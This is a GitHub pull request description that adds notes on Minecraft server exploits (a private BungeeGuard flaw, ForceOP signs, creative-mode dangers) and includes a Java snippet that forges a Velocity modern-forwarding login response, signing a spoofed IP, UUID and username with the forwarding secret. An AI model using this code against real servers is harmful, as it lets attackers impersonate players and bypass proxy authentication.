Skip to content

Adds more information about some exploits and unkown stuff #3

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
SolsticeSpectrum wants to merge 3 commits into
base: main
Choose a base branch
from
Open

Adds more information about some exploits and unkown stuff #3

SolsticeSpectrum wants to merge 3 commits into from

Conversation

@SolsticeSpectrum
Copy link

@SolsticeSpectrum SolsticeSpectrum commented Oct 16, 2024
edited
Loading

  • Changes color for the saw-tooth image for better readability
  • Informs about vulnerability present in BungeeGaurd (I can't detail it now as it's currently a private exploit)
  • Velocity's moder forwarding can be bypassed in similar way as BungeeCord (it is just bit harder because the crafted packets are more complex)
  • Informs about Creative and it's dangers
  • ForceOP signs given creative are still relevant even in modern Minecraft (eg. 1.21) in both Spigot and Paper

As for the modern forwarding spoof, it can be done by crafting special query request packet

        if (packet.getChannel().equals(VELOCITY_CHANNEL) && spoof.isActive()) {
            int requestedForwardingVersion = 1;
            if (packet.getPayload().readableBytes() == 1) requestedForwardingVersion = packet.getPayload().readByte();

            String ip = spoof.getIP();
            byte[] secret = spoof.forwardingSecret.get().getBytes();
            ProfileResponse profile = spoof.getProfile();

            PacketByteBuf buf = new PacketByteBuf(Unpooled.buffer());
            int actualVersion = findForwardingVersion(requestedForwardingVersion);
            buf.writeVarInt(actualVersion);
            buf.writeString(ip);
            buf.writeUuid(profile.getId());
            buf.writeString(spoof.username.get());
            writeProperties(buf, profile.getProperties());

            try {
                SecretKey key = new SecretKeySpec(secret, "HmacSHA256");
                Mac mac = Mac.getInstance("HmacSHA256");
                mac.init(key);
                mac.update(buf.array(), buf.arrayOffset(), buf.readableBytes());
                byte[] sig = mac.doFinal();
                connection.send(new LoginQueryResponseC2SPacket(packet.getQueryId(),
                        new PacketByteBuf(Unpooled.wrappedBuffer(Unpooled.wrappedBuffer(sig), buf))));
                ci.cancel();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@SolsticeSpectrum